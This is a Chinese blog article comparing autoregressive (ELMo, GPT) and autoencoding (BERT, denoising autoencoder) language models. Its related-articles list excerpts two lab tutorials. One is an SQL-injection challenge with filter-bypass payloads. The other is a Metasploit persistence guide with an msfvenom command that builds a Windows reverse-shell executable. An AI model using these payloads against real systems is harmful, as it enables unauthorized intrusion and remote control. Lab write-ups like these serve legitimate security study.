十四、自回归(AutoRegressive)和自编码(AutoEncoding)语言模型

参考自回归语言模型(AR)和自编码语言模型(AE)

1 自回归语言模型( AR)

自回归语言模型(AR)就是根据上文内容(或下文内容)预测下一个(或前一个)可能跟随的单词,就是常说的自左向右(或自右向左)的语言模型任务,即通过前 t - 1(或后 t - 1 ) 个 tokens 来预测当前时刻 t 的 token,代表的自回归语言模型有 ELMO 和 GPT。

1.1 优点

在处理生成类自然语言处理任务时,就是从左向右的,比如文本摘要,机器翻译等,自回归语言模型天然匹配这个过程。

1.2 缺点 

该模型是单向的,只能利用上文或者下文的信息,不能同时利用上文和下文的信息。

自编码语言模型(AE

自动编码器的逻辑过程是指原始 input(设为 x)经过加权(W 和 b)、映射(Sigmoid)之后得到 y,再对 y 反向加权映射回来成为 z。通过反复迭代训练(W 和 b),使得误差函数 L(H) 最小,即尽可能保证 z 近似于 x ,即完美重构了 x。那么可以说正向权重(W 和 b)是成功的,很好的学习了 input 中的关键特征。

自动编码器过程图如下:参考自动编码器

降噪自编码器(Denoising AutoEncoder, DAE)是指当采用无监督(不需要对训练样本进行标记)的方法分层预训练深度网络的权值时,为了学习到较鲁棒的特征,可以在数据的输入层引入随机噪声。

降噪自编码器过程图如下:

自编码语言模型的名称来自于降噪自编码器(DAE),是通过上下文单词来预测被 [Mask] 的 token(这些被 [Mask] 掉的单词其实就是在输入端加入的噪音,是典型的 的思路),通俗地被称为“完形填空”,代表的自编码语言模型有 Word2Vec(CBOW)和 BERT。

2.1 优点

泛化性强,无监督不需要数据标注,可以自然地融入上下文语义信息。

2.2 缺点

  • 适用于“完形填空”式的训练策略,不适用于生成式的问题;
  • 在预训练 Pre-Training 阶段,引入独立性假设,没有考虑预测 [MASK] 之间的相关性;
  • 输入中引入 [Mask] 这一特殊标记对原始 Token 进行替换,而微调 Fine-Tuning 阶段是没有 [Mask] 标记的,导致预训练阶段和微调阶段的数据不一致。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/544401.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

wsl2+docker-desktop环境,个别命令卡住问题

*在win11本地搭建了一套开发环境,之前一直用得很舒服,最近发现些问题,查了几天,记录下解决方案。*环境信息: 问题:在wsl2的ubuntu虚拟机中,有时会出现个别命令运行卡住不返回 像上图&#xff0…

springboot基于spring boot的在线答题微信小程序

摘 要 在线答题微信小程序是考试中重要的一环,在线答题是学生获取任务信息的主要渠道。为了方便学生能够在网站上查看任务信息、考试,于是开发了基于 springboot框架设计与实现了一款简洁、轻便的在线答题微信小程序。本微信小程序解决了在线答题事务中的…

基于最小二乘法的太阳黑子活动模型参数辨识和预测matlab仿真

目录 1.程序功能描述 2.测试软件版本以及运行结果展示 3.核心程序 4.本算法原理 5.完整程序 1.程序功能描述 基于最小二乘法的太阳黑子活动模型参数辨识和预测matlab仿真。太阳黑子是人们最早发现也是人们最熟悉的一种太阳表面活动。因为太阳内部磁场发生变化,…

sqllab第二十五A关通关笔记

知识点: 数值型注入双写绕过 oorranand这里不能用错误注入(固定错误回显信息)联合注入 测试发现跟25关好像一样,就是过滤了and or # 等东西 构造payload:id1/0 发现成功运算了,这是一个数值型的注入 构造payload:id…

滑块验证码

1.这里针对滑块验证给了一个封装的组件verifition,使用直接可以调用 2.组件目录 3.每个文件的内容 3.1 Api文件中只有一个index.js文件,用来存放获取滑块和校验滑块结果的api import request from /router/axios//获取验证图片 export function reqGe…

Spark-Transformation以及Action开发实战

文章目录 创建RDDTransformation以及ActionTransformation开发Action开发RDD持久化共享变量创建RDD RDD是Spark的编程核心,在进行Spark编程是,首要任务就是创建一个初始的RDDSpark提供三种创建RDD方式:集合、本地文件、HDFS文件 集合:主要用于本地测试,在实际部署到集群运…

MySQL--深入理解MVCC机制原理

什么是MVCC? MVCC全称 Multi-Version Concurrency Control,即多版本并发控制,维持一个数据的多个版本,主要是为了提升数据库的并发访问性能,用更高性能的方式去处理数据库读写冲突问题,实现无锁并发。 什…

R语言深度学习-5-深度前馈神经网络

本教程参考《RDeepLearningEssential》 本篇我们将学习如何建立并训练深度预测模型。我们将关注深度前馈神经网络 5.1 深度前馈神经网络 我们还是使用之前提到的H2O包,详细可以见之前的博客:R语言深度学习-1-深度学习入门(H2O包安装报错解决…

从阿里云降价,看中国云计算创新之变

继“疯狂星期四”历史级大降价后,阿里云“AI驱动、公共云优先”的战略布局再落一子。 近日,阿里云与菜鸟、高德地图、中远海运、东航物流、圆通速递、申通快递、中通快递、德邦快递、G7易流、地上铁、浙江大学智能交通研究所等共同发起成立“物流智能联…

cool 中的Midway ----node.js的TypeORM的使用

1.介绍 TypeORM | Midway TypeORM 是 node.js 现有社区最成熟的对象关系映射器(ORM )。本文介绍如何在 Midway 中使用 TypeORM 相关信息: 描述可用于标准项目✅可用于 Serverless✅可用于一体化✅包含独立主框架❌包含独立日志❌ 和老写…

计算机网络-概述

文章目录 1.2 因特网概述1.2.1 网络、互连网(互联网)和因特网1.2.2 因特网发展的三个阶段1.2.4 因特网的组成 1.3 三种交换方式1.3.1 电路交换1.3.2 分组交换1.3.3 报文交换1.3.4 三种方式对比 1.4 计算机网络的定义1.5 计算机网络的性能指标1.5.1 速率1…

渗透测试框架权限维持技术——Persistence模块

测试环境: kali win7 测试步骤: 1.利用MSF编写远控程序 msfvenom -p windows/meterpreter/reverse_tcp lhost10.0.0.163 lport55555 -f exe -o 5555.exe-p 漏洞利用payload lhost 监听地址(kali地址) lport 监听端口&#xf…